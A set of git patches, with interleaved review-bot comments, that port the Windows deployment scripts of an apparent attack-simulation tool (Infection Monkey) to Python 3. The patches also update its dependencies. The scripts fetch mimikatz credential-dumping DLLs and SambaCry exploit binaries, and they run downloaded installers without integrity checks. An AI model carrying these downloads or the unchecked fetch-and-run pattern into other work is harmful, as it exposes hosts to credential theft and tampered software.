From 9a21a50fd16a207fa278dedd0c1f1e0122aa1810 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 01/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" @@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" 
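Review bot: `$PYWIN32_URL` is left as context pointing at `pywin32-224.win-amd64-py2.7.exe` while this hunk drops the Python 2.7 compiler entries and the first hunk moves `$PYTHON_URL` to the 3.7.4 installer; that pywin32 build targets Python 2.7, so the pywin32 step of the deploy script (not visible here) will presumably fail or install against the wrong interpreter. Update it to the py3.7 build in the same commit so config.ps1 stays self-consistent. Separately, every installer listed here is later downloaded and executed without any integrity check; consider recording the expected digest next to each URL, e.g. `$PYTHON_SHA256 = "<expected-hash-placeholder>"`, so the deploy script can verify the file before running it.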
diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" 
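Review bot: The second hunk still runs `$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)` and `Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER`, but this same commit deletes both variables from config.ps1, so the download is attempted with empty arguments and the reworded message `"Downloading Visual C++ Compiler for Python 3 ..."` describes a step that can no longer work. Either remove the whole block in this commit or point it at a Python-3-compatible build-tools package declared in config.ps1, rather than only changing the message. The enclosing `Deploy-Windows` function starts and ends outside the hunk.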
From 2af17bc37193e6d1dad4addf0146265e67566199 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 02/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 +++++------- deployment_scripts/deploy_windows.ps1 | 35 +++++------------------ monkey/infection_monkey/build_windows.bat | 2 +- monkey/infection_monkey/monkey.spec | 12 +------- monkey/monkey_island/requirements.txt | 4 +-- 5 files changed, 18 insertions(+), 53 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 
@@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
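Review bot: `$PYTHON_DLL = "C:\Windows\System32\python27.dll"` survives this hunk as context while `$TEMP_PYTHON_INSTALLER` becomes `python.exe` and `$PYWIN32_URL` moves to the py3.7 build, so whatever consumes `$PYTHON_DLL` (its user is not visible here) will presumably still look for the Python 2.7 runtime; it should be updated or removed together with the other 2.7 leftovers. As a point of style, `$MK32_DLL`/`$MK64_DLL` now hold `mk32.zip`/`mk64.zip`, so the names no longer describe the value; renaming them to e.g. `$MK32_ZIP` at the declaration and its uses would avoid misleading the next reader.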
@@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output 
@@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ 
diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e5ff5a805..e2bf2935e 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec \ No newline at end of file +pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index e6d81e6aa..57ca79348 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,6 +1,6 @@ bson python-dateutil -tornado==5.1.1 +tornado werkzeug jinja2 markupsafe @@ -10,7 +10,7 @@ flask Flask-Pymongo Flask-Restful Flask-JWT -jsonschema==2.6.0 +jsonschema netifaces ipaddress enum34 From fabcd4c9df0ac77e3ac45821ba81a7bab3164741 Mon Sep 17 00:00:00 2001 
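Review bot: Dropping the pins in both requirements.txt hunks (`-tornado==5.1.1` → `+tornado`, `-jsonschema==2.6.0` → `+jsonschema`) makes the island install non-reproducible: pip resolves whatever the newest release is at install time, so two deployments can end up with different, untested versions, and a future major release can break the server or change behaviour without any change to this repository. If the old pins are too old for Python 3.7, pin to the versions that were actually tested instead, e.g. `tornado==<tested-version-placeholder>` and `jsonschema==<tested-version-placeholder>`.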
From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 03/44] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- monkey/monkey_island/requirements.txt | 1 - 4 files changed, 57 insertions(+), 61 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } 
@@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { 
@@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { 
@@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { @@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } 
@@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" @@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, 
@@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json +++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", 
@@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 57ca79348..a2e734324 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -13,7 +13,6 @@ Flask-JWT jsonschema netifaces ipaddress -enum34 pycryptodome boto3 botocore From 04d8f1341bd07e93e50d11b93454ff2c0649f887 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 04/44] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c 